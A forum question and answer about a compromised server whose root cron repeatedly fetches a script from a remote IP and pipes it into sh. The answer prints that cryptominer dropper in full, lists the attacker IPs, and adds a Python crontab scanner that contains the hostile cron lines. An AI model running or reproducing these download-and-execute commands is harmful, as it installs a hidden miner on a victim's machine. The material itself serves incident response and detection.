cron activated in root [duplicate]


For the last three months, every weekend, the following instructions appear in root's cron:

0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh

How can I block this intrusion?

Thanks a lot

posted by jakartaom 27.04.2017 - 15:55

1 answer


If you wget that image and open it w/ nano, it contains the following:

#!/bin/sh
rm -rf /tmp/wqbtraqbpv.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
ps auxf|grep -v grep|grep -v qslulqdbi|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "65.254.63.20"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wqbtraqbpv"|awk '{print $2}'|xargs kill -9
ps -fe|grep qslulqdbi|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/qslulqdbi.conf
rm -rf /tmp/qslulqdbi.conf
curl -o /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
wget -O /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/img/kworker
wget -O /tmp/kauditd http://91.230.47.41/img/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/img/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/img/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c qslulqdbi.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

I would recommend blocking inbound & outbound traffic for:

91.230.47.41
94.23.8.105
37.59.49.7
37.59.51.212
188.165.214.76
176.31.117.82
188.165.254.85

via firewall rules, and removing the cron job.

kworker & kworker_na seem to be clean according to VirusTotal... but I would check your /tmp/kauditd folder and delete them both.

answered 27.04.2017 - 18:58
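On the defensive side, the recurring entries in the question are easy to flag mechanically. The following is an added example, not code from the original post: a small Python scanner that walks crontab text and reports entries that pipe a download straight into a shell, reference one of the hosts listed in the answer, or run something from /tmp. The sample crontab is constructed for the example; the host list is copied from the answer above and is the only page-specific data used.

```python
"""Scan crontab text for download-and-pipe-to-shell persistence (added example)."""
import re

# Hosts copied from the answer above; treat as an IOC list for this example.
SUSPECT_HOSTS = {
    "91.230.47.41", "94.23.8.105", "37.59.49.7", "37.59.51.212",
    "188.165.214.76", "176.31.117.82", "188.165.254.85",
}

# Five schedule fields (or an @reboot-style macro) followed by the command.
CRON_LINE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+|@\w+)\s+(.*)$")
# curl/wget whose output is piped into sh or bash.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
# Host part of any http(s) URL in the command.
URL_HOST = re.compile(r"https?://([^/\s:]+)")
# A /tmp path used as a standalone token (cd /tmp, /tmp/x, ...).
TMP_PATH = re.compile(r"(^|[\s=])/tmp(?=/|\s|$)")


def classify(command):
    """Return the list of reasons a cron command looks suspicious (empty if none)."""
    reasons = []
    if PIPE_TO_SHELL.search(command):
        reasons.append("download piped to shell")
    for host in URL_HOST.findall(command):
        if host in SUSPECT_HOSTS:
            reasons.append(f"known bad host {host}")
    if TMP_PATH.search(command):
        reasons.append("executes from /tmp")
    return reasons


def scan_crontab(text):
    """Yield (line number, entry, reasons) for every suspicious entry in crontab text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        # Skip blanks, comments and environment assignments such as SHELL=/bin/sh.
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = CRON_LINE.match(stripped)
        if not m:
            continue
        reasons = classify(m.group(2))
        if reasons:
            findings.append((lineno, stripped, reasons))
    return findings


# Constructed sample: two benign jobs plus the two entries from the question.
SAMPLE_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh
"""

if __name__ == "__main__":
    for lineno, entry, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {entry}\n    -> {', '.join(reasons)}")
```

To run it against a live system, feed it the output of `crontab -l -u root` and the contents of /etc/cron.d, /etc/crontab and /var/spool/cron; the point is that the "pipe a download into sh" shape is suspicious on its own, whether or not the host is already on a block list.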
